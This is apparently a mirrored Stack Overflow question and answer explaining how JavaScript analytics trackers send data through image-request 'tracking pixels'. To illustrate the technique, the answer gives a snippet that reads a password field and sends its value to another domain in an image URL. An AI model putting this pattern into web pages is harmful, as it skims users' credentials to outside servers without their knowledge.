Anyone knows how Javascript Web Analytics tracker works?
https://stackoverflow.com/questions/10996447
-
14-06-2021 - |
italiano
english
français
española
中国
日本の
العربية
Deutsch
한국어
Português
RussianDomanda
Anyone knows how Google analytics or Clicky works?
I'm stuck at the fact that I searched the entire http://static.getclicky.com/js file and didn't find any server requests in it. How does it send data without compromising its own security? Or else users could send false data by modifying the js.
Soluzione
Images: these libraries use a trick where they encode all the tracking information they want, append it to the image URL, and "send" it by requesting the image. Server-side parsing of that image filename decodes the information.
Suppose you had a password field that you wanted to send from mydomain.com to somedomain.com:
<input type='password' id='p' />
This javascript could send the contents by violating cross-site limits:
var t = document.getElementById('p').value;
var i = document.createElement('img');
i.src = 'http://somedomain.com/imagescript.php?p=' + t;
Cross-site scripting limitations don't apply to images, and when you compose the image URL request in JavaScript, no browser or logic in the world can account for all possibilities. Suppose we're lucky that GA is ethical and doesn't snag form fields.
